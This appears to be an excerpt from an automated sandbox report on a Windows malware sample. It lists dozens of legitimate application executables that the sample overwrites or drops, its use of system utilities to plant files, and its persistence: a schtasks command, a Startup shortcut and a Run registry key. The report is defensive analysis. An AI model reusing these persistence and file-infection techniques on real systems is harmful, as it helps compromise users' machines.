                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file

                    Boot Survival

                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior

                    Hooking and other Techniques for Hiding and Protection

